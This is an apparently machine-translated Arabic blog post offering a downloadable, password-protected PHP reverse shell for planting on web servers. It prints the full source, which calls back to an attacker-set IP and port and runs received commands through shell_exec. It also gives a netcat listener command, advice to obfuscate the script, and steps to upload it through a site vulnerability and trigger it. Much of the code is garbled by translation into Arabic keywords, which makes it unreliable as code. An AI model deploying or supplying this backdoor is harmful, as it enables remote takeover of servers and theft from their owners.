عكس شل V1.0 PHP – المصادقة الميزة
المنتج من قبل:
أشفق الأنصاري
الإصدار:
1.0
السعر:
حر

تم التعليق بواسطة:
تصنيف:
5
في أكتوبر 9, 2012
آخر تعديل:يناير 18, 2013

ملخص:

عكس الاتصال PHP شل مع ميزة مصادقة يحمل في ثناياه عوامل. النصي رهيبة لحماية الباب الخلفي الخاص بك.

مقدمة

 

تم تصميم هذه الأداة لpentest الحالة التي لديك حق الوصول إلى خادم الويب تحميل يعمل بنظام التشغيل PHP.
تحميل هذا البرنامج النصي لفي مكان ما من موقع ويب الجذر ثم تشغيله عن طريق الوصول إلى URL المناسب في متصفحك. سيقوم البرنامج النصي فتح اتصال TCP الصادرة من خادم الويب إلى مضيف ومنفذ محدد في البرنامج النصي. منضمة إلى هذا الاتصال TCP سيكون قذيفة.
 

وستكون هذه المناسبة قذيفة التفاعلية التي يمكنك تشغيل برامج مثل interective التلنت و SSH.
هذا قذيفة لديه ميزة مصادقة يحمل في ثناياه عوامل الذي يمنع أي شخص آخر من استغلال مستتر الخاص.
فهو يختلف عن قذيفة ويب يستند إلى نموذج التي تسمح لك لإرسال أمر واحد, ثم نعود لكم الإخراج.
 

تعديل مصدر

 

1
2
3
$IP = "127.0.0.1"; #تغيير هذا إلى بروتوكول الإنترنت الخاص بك العامة
$ميناء = 4444;      #تغيير هذا إلى المنفذ الخاص بك
$كلمة السر = base64_decode("aGFja3N5c3RlYW0="); #الافتراضي كلمة السر: hacksysteam (MD5)

 

تغيير القيم حسب حاجتك والوضع.
 

التعتيم على المصدر

 

مرة كنت قد فعلت التعديل, يمكنك استخدام أي عبر الإنترنت PHP بفوسكاتور لترميز PHP النصي.
 

مثال: http://www.codeeclipse.com/
 

قبل تشويش, يرجى تغيير القيم أعلاه وفقا للاحتياجات الخاصة بك.
 

الإعداد Netcat مصغي

 

بدء المستمع Netcat على المضيف والمنفذ الذي سوف يكون الوصول إليها من قبل خادم الويب.
استخدام نفس المنفذ هنا كما حددته في البرنامج النصي قذيفة العكسي على سبيل المثال (4444):
 

1
@ الجذر BT:~ # NC -lvvp 4444

 

تحميل السيناريو وتنفيذه

 

باستخدام الضعف التي اكتشفها كنت في الموقع, تحميل reverse_shell.php.
تشغيل البرنامج النصي ببساطة من خلال التصفح إلى الملف الذي تم تحميله حديثا في متصفح الويب الخاص بك.
 

1
HTTP://<IP الضحية>/<تحميل مسار>/reverse_shell.php

 

لاحظ: فإنك لن ترى أي الإخراج على صفحة ويب, الاستمرار في وضع الانتظار في حال نجاحها في.
 

نهب مع قذيفة الخاص

 

شفرة المصدر

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?PHP
###################################################
#               عكس شل V1.0 #
#             المصادقة ميزة #
#                                                 #
#            Hacksys الفريق - النمر #
#             الكاتب: أشفق الأنصاري #
#            hacksysteam@hotmail.com #
#          HTTP://hacksys.vfreaks.com #
#              مصممة لينكس #
#             بفضل lionaneesh #
#             lionaneesh@gmail.com #
###################################################

ini_set('max_execution_time',0);

$VERSION = "1.0";
$IP = "127.0.0.1"; #تغيير هذا
$ميناء = 4444;      #تغيير هذا
$كلمة السر = base64_decode(&quot;aGFja3N5c3RlYW0="); #الافتراضي كلمة السر: hacksysteam (MD5)

$راية = ("
 _ _ _ _____
| |  | |          | |   / ____|                            
| |__| | __ _ ___| | _| (___ _ _ ___
|  __|/ _ ` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_ _____ / __, |___ /
 _______ __ / |                                
|__ __|                      |___ /
   | | ___ __ _ _ __ ___
   | |/ _ \/ _ ` | '_ `_ \
   | |  __ / (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    عكس شل في PHP
    الكاتب: أشفق الأنصاري
   hacksysteam@hotmail.com
 HTTP://hacksys.vfreaks.com /"
);

$الأشخاص ذوي الإعاقة = shell_exec("الأشخاص ذوي الإعاقة");
$[سسنفو = shell_exec("uname واحد");
$معرف = shell_exec('معرف | خفض د "(" -و 2 | خفض د ")" -و 1 ');
$تاريخ = shell_exec("تاريخ");
$فقط = 1337;
$معلومات =
("
نظام المعلومات:$[سسنفو
دليل العمل الحالي: $الأشخاص ذوي الإعاقة
مجموعة المستخدم: $معرف
التاريخ والوقت الحالي: $تاريخ
"
);

طباعة "يحاول الاتصال: $IP على المنفذ $ميناء ...";

$sockfd = fsockopen($IP , $ميناء , $errno, $errstr );

إذا($errno != 0)
  {
    طباعة "****** حدث خطأ ******Nnumber خطأ: $errnoسلسلة خطأ: $errstr";
    ال(0);
  }
آخر إذا (!$sockfd)
  {
    طباعة "فادح : وقد حدث خطأ غير متوقع عند محاولة الاتصال!";
  }
آخر
  {
    طباعة "متصلة: $IP على المنفذ $ميناء ...";
    fputs ($sockfd , $راية);
    fputs($sockfd ,"أدخل كلمة المرور: ");
    $getpass = تقليم(fgets($sockfd, التوابع strlen($كلمة السر) + 2));

    إذا ($getpass == $كلمة السر)
    {
      fputs($sockfd, "النجاح المصادقة..");
      fputs($sockfd, $معلومات);
      في حين(!EOF($sockfd))
      {
    $cmdPrompt = تقليم($معرف) . "@" . تقليم($IP) . ":~" . تقليم($الأشخاص ذوي الإعاقة) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $قيادة = تقليم(fgets($sockfd, $فقط));
        إذا (تقليم($قيادة) == "خروج")
    {
      fputs($sockfd ,"إحباط من قبل المستخدم ... الخروج ..." );
      fclose($sockfd);
      ال(0);
    }
    fputs($sockfd , "" . shell_exec($قيادة) . "");
      }
      fclose($sockfd);
      ال(0);
    }
    آخر
    {
      fputs($sockfd ,"كلمة السر غير صحيحة ... الإقلاع عن التدخين ...");
      fclose($sockfd);
      ال(0);
    }
  }
?>

 

لقطة

 


 

تحميل عكسي شل V1.0 PHP – المصادقة الميزة

 

Reverse_Shell_v1.0.zip

 
 
 

21,003 مجموع المشاهدات, 11 مشاهدات اليوم

اللسانين التالية تغيير المحتوى أدناه.

أشفق الأنصاري

باحث الأمن
أشفق الأنصاري هو مؤسس HackSys الفريق اطلق عليها اسم "النمر". فهو باحث الأمن ذوي الخبرة في مختلف جوانب أمن المعلومات. قام بتأليف انه "HackSys المتطرفة سائق الضعفاء" و "Shellcode من الموت". وقد كتب أيضا ونشرت صفحات بيضاء مختلفة على استغلال البرمجيات على مستوى منخفض. اهتمامه الأساسية تكمن في "انخفاض مستوى الاستغلال", "الهندسة العكسية", "تحليل البرنامج" و "الهجين التضبيب". وهو بوي الذكاء الاصطناعي وآلة التعلم. وهو يؤدي الفصل ل اغية بيون.

أحدث المشاركات التي كتبها أشفق الأنصاري (انظر جميع)

ترك الرد

لن يتم نشر عنوان بريدك الإلكتروني. يتم وضع علامة الحقول المطلوبة *